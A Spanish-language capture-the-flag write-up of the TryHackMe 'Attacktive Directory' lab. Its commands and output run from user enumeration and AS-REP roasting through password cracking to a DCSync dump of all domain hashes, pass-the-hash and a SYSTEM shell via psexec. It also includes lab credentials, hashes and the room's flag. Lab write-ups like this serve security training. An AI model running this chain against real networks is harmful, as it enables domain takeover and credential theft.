TryHackMe - AttactiveDirectory (medium)

PortScan

❯ sudo nmap -sCV -p88,135,139,389,464,593,3389,5985,47001,49664,49665,49667,49669,49672,49675,49676 10.10.161.28 -oN targeted
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-27 20:17 CST
Nmap scan report for 10.10.161.28
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-27 19:54:18Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-12-27T19:55:16+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2024-12-26T19:52:32
|_Not valid after:  2025-06-27T19:52:32
|_ssl-date: 2024-12-27T19:55:29+00:00; -6h23m28s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)
|_clock-skew: mean: -6h23m29s, deviation: 1s, median: -6h23m30s

Enumeración

• Vemos que estamos ante un Windows 10.

❯ netexec smb 10.10.161.28
SMB         10.10.161.28    445    ATTACKTIVEDIREC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)

• Vamos agregar el subdominio al /etc/hosts.

❯ echo "10.10.161.28 spookysec.local" | sudo tee -a /etc/hosts
10.10.161.28 spookysec.local

• De momento no vemos nada.

❯ smbclient -N -L 10.10.161.28
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.161.28 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

• En el room mencionan el uso de kerberos así que vamos a usarlo para enumerar usuarios del Dominio https://github.com/ropnop/kerbrute/releases.

• Vamos a usar un diccionario que contenga nombres de usuarios.

❯ /opt/kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.161.28 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/27/24 - Ronnie Flathers @ropnop

2024/12/27 20:25:11 >  Using KDC(s):
2024/12/27 20:25:11 >  	10.10.161.28:88

2024/12/27 20:25:11 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2024/12/27 20:25:11 >  [+] VALID USERNAME:	 james@spookysec.local
2024/12/27 20:25:18 >  [+] VALID USERNAME:	 James@spookysec.local
2024/12/27 20:25:20 >  [+] VALID USERNAME:	 robin@spookysec.local
2024/12/27 20:25:36 >  [+] VALID USERNAME:	 darkstar@spookysec.local
2024/12/27 20:25:46 >  [+] VALID USERNAME:	 administrator@spookysec.local
2024/12/27 20:26:08 >  [+] VALID USERNAME:	 backup@spookysec.local
2024/12/27 20:26:17 >  [+] VALID USERNAME:	 paradox@spookysec.local
2024/12/27 20:27:18 >  [+] VALID USERNAME:	 JAMES@spookysec.local

• Vamos agregarlos a una lista.

❯ cat users.txt
svc-admin
james
robin
darkstar
administrator
backup
paradox

• Vamos hacer un ASRPRoast Attack ya que tenemos usuarios https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast.

• Tenemos un hash.

❯ impacket-GetNPUsers -no-pass -usersfile users.txt spookysec.local/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:aa8759210952742c83330aad06aa9409$e4a83c2507a6f8dc5518485920e7464080f1ed275d1b628c763e6d05700f2065f8e3bbc71a26fbc94fdbbf9cd988d6055ffa4a7b3c1d5b4277b18611629434c725b4ee316746322566eb784844c6ed9a1fb958b32e19bfcd890cc18a99b7b2c365bea11de398915b9e821bdd6805143923c2ea88823d05d484decc8f2eb18d5212d4eb993cb9d108df138754dd4297aa65569c7ffe8251684b9499d298c8627847924e6ffb05a042e092d985d2dd136277f1308967c1cbcbf583366c675e6b27809c67e5a8a7ac231e985078a936a6fe3b3b6d8e43c37f2ec6b73684cf634036137666a7ca84fbc2ef831218db1a9374ae3d
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set

• Vamos a crackearlo.

❯ john -w:/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
management2005   ($krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL)     
1g 0:00:00:09 DONE (2024-12-27 20:30) 0.1071g/s 625704p/s 625704c/s 625704C/s manaia05..man3333
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

• Como tenemos credenciales podemos enumerar por smb.

❯ netexec smb 10.10.161.28 -u svc-admin -p management2005 --shares
SMB         10.10.161.28    445    ATTACKTIVEDIREC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
SMB         10.10.161.28    445    ATTACKTIVEDIREC  [+] spookysec.local\svc-admin:management2005
SMB         10.10.161.28    445    ATTACKTIVEDIREC  [*] Enumerated shares
SMB         10.10.161.28    445    ATTACKTIVEDIREC  Share           Permissions     Remark
SMB         10.10.161.28    445    ATTACKTIVEDIREC  -----           -----------     ------
SMB         10.10.161.28    445    ATTACKTIVEDIREC  ADMIN$                          Remote Admin
SMB         10.10.161.28    445    ATTACKTIVEDIREC  backup          READ            
SMB         10.10.161.28    445    ATTACKTIVEDIREC  C$                              Default share
SMB         10.10.161.28    445    ATTACKTIVEDIREC  IPC$            READ            Remote IPC
SMB         10.10.161.28    445    ATTACKTIVEDIREC  NETLOGON        READ            Logon server share
SMB         10.10.161.28    445    ATTACKTIVEDIREC  SYSVOL          READ            Logon server share

• Vamos a conectarnos a backup.

❯ smbclient //10.10.161.28/backup -U svc-admin --password management2005
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 13:08:39 2020
  ..                                  D        0  Sat Apr  4 13:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 13:08:53 2020

		8247551 blocks of size 4096. 3564729 blocks available
smb: \> 

• Vamos a descargar eso.

smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

• Esta en base64 pero al decodear es una contraseña.

❯ echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
backup@spookysec.local:backup2517860  

• Vemos que son validas.

❯ netexec smb 10.10.161.28 -u backup -p backup2517860
SMB         10.10.161.28    445    ATTACKTIVEDIREC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
SMB         10.10.161.28    445    ATTACKTIVEDIREC  [+] spookysec.local\backup:backup2517860 

• Si nos vamos al Task 7 nos dice que usemos secretsdump.py y nos dan la siguiente información útil.

Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account “backup” gets us thinking. What is this the backup account to? Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.

❯ impacket-secretsdump WORKGROUP/backup:backup2517860@10.10.161.28
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:b0d3f50f1016da643c34d840ad4af261:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:2e25b4c046667051ea9bebf92b92767970d483b2f83f07770a0e7b05dc3fee26
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:0f2ab043451fb33305099592a4bb08d9
ATTACKTIVEDIREC$:des-cbc-md5:43750b80807a3d02
[*] Cleaning up... 

• Ahora tenemos el hash nt del usuario Administrator que es el mas importante vamos a comprobar si es valido.

❯ netexec smb 10.10.161.28 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
SMB         10.10.161.28    445    ATTACKTIVEDIREC  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
SMB         10.10.161.28    445    ATTACKTIVEDIREC  [+] spookysec.local\Administrator:0e0363213e37b94221497260b0bcb4fc (Pwn3d!)

• Nos conectamos.

❯ impacket-psexec WORKGROUP/Administrator@10.10.161.28 -hashes :0e0363213e37b94221497260b0bcb4fc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.161.28.....
[*] Found writable share ADMIN$
[*] Uploading file OhcqNVZU.exe
[*] Opening SVCManager on 10.10.161.28.....
[*] Creating service Sram on 10.10.161.28.....
[*] Starting service Sram.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1490]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
The system cannot find the file specified.
Error occurred while processing: type.

C:\Users\Administrator\Desktop\root.txt


TryHackMe{4ctiveD1rectoryM4st3r}
C:\Users>